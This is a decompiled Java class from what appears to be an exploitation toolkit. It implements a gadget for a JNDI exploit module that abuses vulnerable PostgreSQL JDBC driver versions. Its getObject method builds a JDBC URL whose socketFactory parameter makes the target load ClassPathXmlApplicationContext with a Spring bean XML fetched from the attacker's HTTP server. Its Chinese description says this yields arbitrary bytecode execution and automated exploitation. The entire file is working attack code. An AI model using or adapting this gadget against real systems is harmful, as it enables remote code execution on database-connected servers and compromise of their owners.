package com.ar3h.chains.gadget.impl.common.jdbc;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import java.util.Iterator;
import java.util.Map;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

@GadgetAnnotation(name = "PostgreSQL JDBC 仅适用于JNDI模块", alias = "pgsql", description = "注意，本Gadget只适用于在JNDI Exploit 模块中使用\n适用于jdbc rce场景，通过 ClassPathXmlApplicationContext 加载本地xml，实现执行任意字节码\n该 JNDI 版会自动生成spring bean xml文件并缓存到 JNDI Exploit 中，实现自动化利用", dependencies = {"org.postgresql:postgresql:org.postgresql.Driver", "9.4.1208 <= org.postgresql:postgresql <42.2.25", "42.3.0 <= org.postgresql:postgresql < 42.3.2"}, priority = 40)
@GadgetTags(tags = {Tag.PostgreSQLJdbcUrl, Tag.JdbcUrlChains}, nextTags = {"SpringBeanXmlExec", "SpringBeanXmlSpEL", "SpringBeanXmlClassLoader"})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/jdbc/PostgreSqlJdbc4Jndi.class */
public class PostgreSqlJdbc4Jndi implements Gadget {
    private static final Logger log = LoggerFactory.getLogger((Class<?>) PostgreSqlJdbc4Jndi.class);
    public String driverClassName = "org.postgresql.Driver";
    GadgetContext context;

    public String getObject() {
        String str = "";
        Object obj = this.context.get(ContextTag.CACHE_FILES_MAP);
        if (obj != null) {
            Iterator it = ((Map) obj).entrySet().iterator();
            if (it.hasNext()) {
                str = (String) ((Map.Entry) it.next()).getKey();
            }
        }
        String str2 = this.context.get(ContextTag.JNDI_HTTP_URL) + str;
        this.context.put("xmlHttpUrl", str2);
        log.info("postgresql bean.xml jndi http url: {}", str2);
        return "jdbc:postgresql://127.0.0.1:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=" + str2;
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        this.context = gadgetContext;
        gadgetChain.doCreate(gadgetContext);
        String object = getObject();
        gadgetContext.put(ContextTag.DRIVER_CLASS_NAME_KEY, this.driverClassName);
        return object;
    }
}
